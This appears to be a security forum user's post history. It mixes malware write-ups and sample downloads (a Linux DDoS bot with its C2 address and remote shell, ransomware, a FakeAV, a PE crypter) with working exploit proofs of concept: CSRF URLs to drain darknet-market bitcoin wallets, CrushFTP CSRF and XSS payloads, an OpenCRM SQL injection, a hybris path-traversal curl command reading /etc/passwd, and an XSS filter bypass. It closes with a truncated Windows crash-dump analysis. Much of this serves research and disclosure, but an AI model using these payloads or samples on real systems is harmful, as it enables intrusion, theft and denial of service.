Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one. This sample was served in the panel below, noted: just being released sample: Some notes: Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474) Accept-Language: zh-cn Accept-Language: zh-CN Autostart installation: sed -i -e '/%s/d' /etc/rc.local sed -i -e '2 i%s/%s' /etc/rc.local sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local sed -i -e '2 i%s/%s start' /etc/init.d/boot.local Source files (unstripped) File : 'crtstuff.c' File : 'AES.cpp' File : 'main.cpp' File : 'eh_personality.cc' File : 'eh_alloc.cc' File : 'eh_exception.cc' File : 'eh_call.cc' File : 'pure.cc' File : 'eh_globals.cc' File : 'del_op.cc' File : 'eh_catch.cc' File : 'class_type_info.cc' File : 'allocator-inst.cc' File : 'string-inst.cc' File : 'eh_terminate.cc' File : 'eh_term_handler.cc' File : 'si_class_type_info.cc' File : 'eh_throw.cc' File : 'eh_unex_handler.cc' File : 'vterminate.cc' File : 'tinfo.cc' File : 'new_op.cc' File : 'eh_type.cc' File : 'cp-demangle.c' File : 'functexcept.cc' File : 'regex.cc' File : 'system_error.cc' File : 'functional.cc' File : 'future.cc' File : 'new_handler.cc' File : 'bad_typeid.cc' File : 'bad_alloc.cc' File : 'eh_ptr.cc' File : 'guard.cc' File : 'guard_error.cc' File : 'bad_cast.cc' File : 'ios_failure.cc' File : 'stdexcept.cc' File : 'condition_variable.cc' File : 'mutex.cc' File : 'thread.cc' File : 'unwind-dw2.c' File : 'unwind-dw2-fde-dip.c' File : 'libgcc2.c' File : 'unwind-c.c' Some PoC of AES: .text:0804832C ; AES::AES(unsigned char *) .text:0804832C public _ZN3AESC2EPh ;; .text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4]) .text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h ;; DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood ;; DDOS 1 0x0804EE62: mov eax, [ebp+arg_0] mov eax, [eax+18Ch] cmp eax, 28h jg short 0x0804EE9D mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create jmp short 0x0804EEC8 ;; DDOS 2 0x0804EE9D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create ;; DDOS 3 0x0804EEED: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 4 0x0804EF3D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 5 0x0804EF8D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 6 0x0804EFDD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 7 0x0804F02D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 8 0x0804F07D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 9 0x0804F0CD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 10 0x0804F11D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 11 0x0804F16D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 12 0x0804F1BD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 13 0x0804F20A: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 System command interface for execution.. this is bad...hacked server can be used as RAT .text:0x0804E6C2 ; Cmdshell(_MSGHEAD *) .text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD .text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near .text:0x0804E6C2 .text:0x0804E6C2 arg_0= dword ptr 8 .text:0x0804E6C2 .text:0x0804E6C2 push ebp .text:0x0804E6C3 mov ebp, esp .text:0x0804E6C5 sub esp, 18h .text:0x0804E6C8 mov eax, [ebp+arg_0] .text:0x0804E6CB add eax, 100h .text:0x0804E6D0 mov [esp], eax .text:0x0804E6D3 call system .text:0x0804E6D8 leave .text:0x0804E6D9 retn .text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp .text:0x0804E6D9 We can expect CPU info with below format will be sent to remote: :` .text:0x080509E2 lea eax, [ebp+var_1110] .text:0x080509E8 add eax, 68h .text:0x080509EB mov [esp+4], eax .text:0x080509EF lea eax, [ebp+var_1110] .text:0x080509F5 add eax, 64h .text:0x080509F8 mov [esp], eax .text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *) .text:0x08050A00 lea eax, [ebp+var_11D0] .text:0x08050A06 mov [esp], eax .text:0x08050A09 call sysinfo .text:0x08050A0E mov [ebp+var_24], eax .text:0x08050A11 mov eax, [ebp+var_11C0] .text:0x08050A17 shr eax, 14h .text:0x08050A1A mov [ebp+var_10A4], eax .text:0x08050A20 mov edx, [ebp+var_11C0] .text:0x08050A26 mov eax, [ebp+var_11BC] .text:0x08050A2C mov ecx, edx .text:0x08050A2E sub ecx, eax .text:0x08050A30 mov eax, ecx .text:0x08050A32 shr eax, 14h .text:0x08050A35 mov [ebp+var_10A0], eax .text:0x08050A3B lea ebx, [ebp+var_43C] .text:0x08050A41 mov eax, 0 .text:0x08050A46 mov edx, 100h .text:0x08050A4B mov edi, ebx .text:0x08050A4D mov ecx, edx .text:0x08050A4F rep stosd .text:0x08050A51 mov ebx, [ebp+var_10A0] .text:0x08050A57 mov ecx, [ebp+var_10A4] .text:0x08050A5D mov edx, [ebp+var_10A8] .text:0x08050A63 mov eax, [ebp+var_10AC] .text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker" .text:0x08050A71 mov [esp+1Ch], ebx .text:0x08050A75 mov [esp+18h], ecx .text:0x08050A79 mov [esp+14h], edx .text:0x08050A7D mov [esp+10h], eax .text:0x08050A81 lea eax, [ebp+var_1110] .text:0x08050A87 mov [esp+0Ch], eax .text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"... .text:0x08050A93 mov dword ptr [esp+4], 400h .text:0x08050A9B lea eax, [ebp+var_43C] .text:0x08050AA1 mov [esp], eax .text:0x08050AA4 call snprintf .text:0x08050AA9 mov eax, ds:MainSocket .text:0x08050AAE test eax, eax CNC: sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215") Loc: 119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK DOWNLOAD Pass: infected Source
  2. Aerosol
    Another generic ransomware. Blog: Blaze's Security Blog: Yet another ransomware variant Attached: 88039ecb68749ea7d713e4cf9950ffb2947f7683 7e1dd704684f01530307f81bbdc15fe266ffd8db DOWNLOAD Source
  3. Aerosol
    Arid Viper: Gaza vs Israel Cyber Conflict http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf Dubbed TROJ_STRPADT and TROJ_STRPSP by Trend Micro. All files mentioned in whitepaper attached. Arid_Viper_2.zip Arid_Viper_1.zip Source
  4. Aerosol
    2010 year FakeAV 2011 year FakeAV 2012 year FakeAV 2013 year FakeAV 2014 year FakeAV remark end New year, new roguewares. This one is: Malware Defender 2015 Download: HERE
  5. Aerosol
    Scam can be found at: hxxp://vikingwebscanner.com/ron2/adw/ executable attached Link download: HERE Pass: infected Source
  6. Aerosol
    Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government. This mockery of justice has not gone unnoticed. In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack. To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack: URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit= URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices. There will be more to come. Stay safe. Stay anonymous. -The Guardians of Peace Source
  7. Aerosol
    ======================================================== I. Overview ======================================================== Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows an attacker to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. ======================================================== II. Severity ======================================================== Rating: Medium Remote: Yes Authentication Require: Yes ======================================================== III. Vendor's Description of Application ======================================================== CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. 'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate the transfer of many types of files. Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. This keeps your server secure from unwanted abuse. User management includes inheritance, groups, and virtual file systems. If you want simple user management, it can be as easy as just making a folder with a specific name and nothing else. Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. http://www.crushftp.com/index.html ======================================================== IV. Vulnerability Details & Exploit ======================================================== 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) a) An attacker may add/delete/modify user's accounts May change all configuration settings Request Method: POST Location: /WebInterface/fuction/ Proof of Concept:- <html> <body> <form action="http://127.0.0.1:8080/WebInterface/function/" method="POST"> <input type="hidden" name="command" value="setUserItem" /> <input type="hidden" name="data&&95;action" value="new" /> <input type="hidden" name="serverGroup" value="MainUsers" /> <input type="hidden" name="username" value="Hacker" /> <input type="hidden" name="user" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><user&&32;type&&61;"properties"><username>Hacker<&&47;username><password>123456<&&47;password><max&&95;logins>0<&&47;max&&95;logins><root&&95;dir>&&47;<&&47;root&&95;dir><&&47;user>" /> <input type="hidden" name="xmlItem" value="user" /> <input type="hidden" name="vfs&&95;items" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><vfs&&32;type&&61;"properties"><&&47;vfs>" /> <input type="hidden" name="permissions" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><permissions&&32;type&&61;"properties"><item&&32;name&&61;"&&47;">&&40;read&&41;&&40;write&&41;&&40;view&&41;&&40;resume&&41;<&&47;item><&&47;permissions>" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2) Multiple Cross-Site Scripting (Web Interface - Default Config) Type: Reflected Request Method: POST Location: /WebInterface/function/ Parameter: vfs_items Values: <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> vfs_items = <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> Proof of Concept: POST /WebInterface/function/ HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html Content-Length: 656 Cookie: XXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0<a%20xmlns:a%3d'http://www.w3.org/1999/xhtml'><a:body%20onload%3d'alert(1)'/></a>%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E Type: Reflected Request Method: GET Location: /WebInterface/function/ Parameter: path Values: <script>alert(1)<%2fscript> path=%<script>alert(1)<%2fscript> GET /WebInterface/function/?command=getXMLListing&format=JSONOBJ&path=%<script>alert(1)<%2fscript>&random=0.3300707341372783 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/ Cookie: XXXXXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ======================================================== VI. Affected Systems ======================================================== Software: Crushftp (Web Interface) Version: 7.2.0 Build : 147 < 7.3 Configuration: Default ======================================================== VII. Vendor Response/Solution ======================================================== Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Solution : upgrade to 7.3 or change <csrf>true</csrf> in prefs.xml ======================================================== VIII. Credits ======================================================== Discovered by Rehan Ahmed knight_rehan@hotmail.com Source
  8. Aerosol
    Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". Changes: Added Windows 8/8.1 support. Download: here Link website: nullsecurity
  9. Aerosol
    Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business Threat Level: High Severity: High CVSS Severity Score: 8.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (3) Error-Based SQL Injection Vulnerabilities (2) Time-Based Blind SQL Injection Vulnerabilities Vendor Overview OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers. Proof of Concept: https://demo.opencrm.co.uk:443/index.php?action=index&module=Calendar&action=setField&curr_row=&field=a ssigned_user_id&mode=list&module=Field&popuptype=&record=1&value='AND(Select%201%20from(selec t%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(112)%2cC HAR(73)%2cCHAR(108)%2cCHAR(88)%2cCHAR(72)%2cCHAR(51)%2cCHAR(52)%2cCHAR(114))%20f rom%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_sche ma.tables%20group%20by%20x)a)and'&viewid=0 Read more: http://dl.packetstormsecurity.net/1502-exploits/OpenCRM.pdf
  10. Aerosol
    Proof of Concept 1: http://www.mediafire.com/dynamic/ct.php?link=norm_header_up_btn&url=%2F%25%77%77%77% 2E%79%61%68%6F%6F%2E%63%6F%6D%20%20 Read more: http://dl.packetstormsecurity.net/1502-exploits/Mediafire.pdf
  11. Aerosol
    # Affected software: 4images # Type of vulnerability: clickjacking,xss # URL: http://www.4homepages.de/ # Discovered by: Provensec # Website: http://www.provensec.com # Description: 4images is a powerful web-based image gallery management system. Features include comment system, user registration and mangagement, password protected administration area with browser-based upload and HTML templates for page layout and design. # Proof of concept 1st:click jacking --: 4images was vuln to clickjacking which could be exploited and used to delete category http://i.imgur.com/vqfz8Lk.png clickjacking poc -: http://prntscr.com/670r9b 2nd: xss adding a new category with xss payload leads to persistent xss vuln http://prntscr.com/670rmi -- Best Regards, *Ankit Bharathan.* *Save Energy... Save Nature... Go Green...* P *Consider the environment. Please don't print this e-mail unless absolutely necessary.* Source
  12. Aerosol
    Advisory: Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite During a penetration test, RedTeam Pentesting discovered a Directory Traversal vulnerability in hybris Commerce software suite. This vulnerability allows attackers to download arbitrary files of any size from the affected system. Details ======= Product: hybris Commerce Software Suite Affected Versions: Release 5.3: <= 5.3.0.1 Release 5.2: <= 5.2.0.3 Release 5.1.1: <= 5.1.1.2 Release 5.1: <= 5.1.0.1 Release 5.0.4: <= 5.0.4.4 Release 5.0.3: <= 5.0.3.3 Release 5.0.0: <= 5.0.0.3 Fixed Versions: Release 5.3: 5.3.0.2 Release 5.2: 5.2.0.4 Release 5.1.1: 5.1.1.3 Release 5.1: 5.1.0.2 Release 5.0.4: 5.0.4.5 Release 5.0.3: 5.0.3.4 Release 5.0.0: 5.0.0.4 Vulnerability Type: Directory Traversal, Arbitrary File Disclosure Security Risk: high Vendor URL: http://www.hybris.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016 Advisory Status: published CVE: CVE-2014-8871 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871 Introduction ============ "hybris delivers a commerce software suite that is best in class, helping a company execute all its direct selling processes and present a single view and a unified experience to all its customers." (from the vendor's homepage) More Details ============ Webshops based on hybris may use an image retrieval system where images are identified by a URL parameter named "context" rather than a file name. When this system is used, images can be referenced e.g. like the following: <img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3 YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" /> Changing the file name part of the URL from "image.jpg" to e.g. "redteam.jpg" reveals that not the file name part of the URL, but the value of the parameter "context" is used to select the desired file. A closer look at the parameter shows that its value is encoded as Base64. Decoding it reveals a pipe-separated data structure which includes a file size (third value), a file name (fifth value) and a SHA-256 hash (sixth value): $ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\ Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\ 1OTkxYjc4NTJiODU1" | base64 -d master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89 96fb92427ae41e4649b934ca495991b7852b855 During the penetration test many parameters were inspected and it turned out that the SHA-256 hash is used to reference a particular version of the file, and can be replaced by a dash ("-") character, which always returns the latest version. The example request can be modified and requested with curl as follows: $ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64 bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt $ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\ 8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt It was verified that the file name (fifth) value is vulnerable to directory traversal. This enables attackers to retrieve the contents of other files from the server's filesystem by using sequences of "../". The following HTTP request for example delivers the contents of the file "/etc/passwd": $ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\ | base64 -w0 bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz c3dkfC0= $ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\ IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [...] The size included in the third field of the data structure is used to limit the number of bytes returned for a file. As it can be modified by attackers, files of any size with arbitrary content can be downloaded, provided the path to the file on the server is known. This enables attackers to read, among others, the environment of the current process at /proc/self/environ and the list of memory maps including the full paths to loaded libraries at /proc/self/maps. This way, knowledge about a particular instance of hybris can be gathered. Afterwards it is possible to access configuration files like "local.properties" and the log files for shop orders which also contain the current session-IDs of users. Furthermore, the Java bytecode of hybris can be downloaded and decompiled. Proof of Concept ================ ------------------------------------------------------------------------ FILENAME=/etc/passwd curl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \ "master|root|200000000|text/plain|../../../../../..${FILENAME}|-") ------------------------------------------------------------------------ Workaround ========== Implement a new filter which validates file names and insert this filter before hybris' own MediaFilter. The new filter should return an error when a file outside the media directory is requested. Fix === Upgrade to a fixed hybris version or apply the vendor's hot fix. Security Risk ============= This vulnerability can be used to download files from the file system of the server. This includes, among others, configuration files and the hybris order logfile, which contains sensitive data. Therefore, the vulnerability poses a high risk. Timeline ======== 2014-10-08 Vulnerability identified 2014-10-08 Customer notified vendor 2014-10-29 Vendor released fixed version 2014-11-11 CVE number requested 2014-11-12 Vendor requests more time to notify their customers 2014-11-14 CVE number assigned 2014-12-08 Vendor again requests more time to notify customers 2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18 2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines 2015-02-18 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source
  13. Aerosol
    XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so: </script><script>alert(1)+" You could of course use a standard ",alert(1)," but what if quotes are filtered? I then came up with the idea of using SVG and an HTML escaped quote. This bypasses the filter and is a HTML XSS vector that doesn’t have a DOM vulnerability so it’s within scope of the filter and is very common in my experience. Here is the final vector: <script> x = "</script><svg><script>alert(1)+""; XSS auditor PoC: HERE Source
  14. Aerosol
    I receive crash dumps containing pirated antiviruses all the time, however I felt the need to blog about it for once because it's actually so often and just comical to me at this point. I also haven't blogged in a little while. I'm not really here to discuss the pros & cons of antivirus software, it's obvious. What I will say however is it's also obvious that for any software you install regardless of its intended job, you're increasing your attack surface. Given the fact that most antiviruses are granted complete come/go access to the kernel, have the highest privileges, have various kernel-mode drivers, etc, your surface is increased just that much more. Let's take a look at this crash dump (unfortunately only a Small Memory dump...): 2: kd> .bugcheck Bugcheck code 00000024 Arguments 00000000`001904fb fffff880`085866a8 fffff880`08585f00 fffff880`016b1d82 Right, so we have our bug check - NTFS_FILE_SYSTEM (0x24). Big hint, if you see this bug check on a crash dump from a user, chances are it's 50/60% (or more) the fault of either the one security application they have installed (whatever the actual problem with the application is), or user error as far as installing more than one security applications go. It's generally a bad idea to pigeonhole a bug check with a single problem (because it's ridiculous to do so), but I'd personally say over the years 0x24 has been much more of a security software issue than anything else. 2: kd> .exr fffff880`085866a8 ExceptionAddress: fffff880016b1d82 (Ntfs!NtfsRemoveHashEntry+0x00000000000000c2) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000000 Parameter[1]: ffffffffffffffff Attempt to read from address ffffffffffffffff By taking a look at the exception record structure, we can see the direct reason for the exception being thrown that caused the actual crash was an access violation occurring in Ntfs!NtfsRemoveHashEntry. Now that we know why, let's take a look at the context record using the address from our 3rd parameter in the .bugcheck output. 2: kd> .cxr fffff880`08585f00 rax=0000000000000000 rbx=fffff8a00224e050 rcx=0001000000000000 rdx=0000000000000000 rsi=000000001fdefdd9 rdi=fffffa80049be358 rip=fffff880016b1d82 rsp=fffff880085868e0 rbp=00000000000001d9 r8=00000000000003b2 r9=0000000000000000 r10=00000000000003b2 r11=fffff88008586910 r12=0000000000000001 r13=0000000000000000 r14=0000000000000001 r15=fffff8a003533ed0 iopl=0 nv up ei pl nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206 Ntfs!NtfsRemoveHashEntry+0xc2: fffff880`016b1d82 397110 cmp dword ptr [rcx+10h],esi ds:002b:00010000`00000010=???????? On the instruction regarding Ntfs!NtfsRemoveHashEntry, we can see it was comparing the esi register to the memory at address rcx+10. rcx looks pretty bogus, and just to confirm: 2: kd> !pte 0001000000000000 // Or !pte rcx VA 0001000000000000 PXE at FFFFF6FB7DBED000 PPE at FFFFF6FB7DA00000 PDE at FFFFF6FB40000000 PTE at FFFFF68000000000 Unable to get PXE FFFFF6FB7DBED000 WARNING: noncanonical VA, accesses will fault ! So here's the reason why the exception was thrown, it was noncanonical. Now that we've also instructed the debugger to use the context record as the register context, we can run a k(b,nL,whatever) to get a more detailed stack in our case - even with a Small Memory dump: 2: kd> k *** Stack trace for last set context - .thread/.cxr resets it Child-SP RetAddr Call Site fffff880`085868e0 fffff880`016b224f Ntfs!NtfsRemoveHashEntry+0xc2 fffff880`08586970 fffff880`016b0a24 Ntfs!NtfsDeleteNormalizedName+0x7f fffff880`085869a0 fffff880`016b4cdb Ntfs!NtfsDeleteScb+0x1f4 fffff880`085869e0 fffff880`0162e343 Ntfs!NtfsRemoveScb+0x5b fffff880`08586a20 fffff880`016b2a3c Ntfs!NtfsPrepareFcbForRemoval+0x53 fffff880`08586a50 fffff880`01635a52 Ntfs!NtfsTeardownStructures+0xdc fffff880`08586ad0 fffff880`016c22d3 Ntfs!NtfsDecrementCloseCounts+0xa2 fffff880`08586b10 fffff880`01714d32 Ntfs!NtfsCommonClose+0x353 fffff880`08586be0 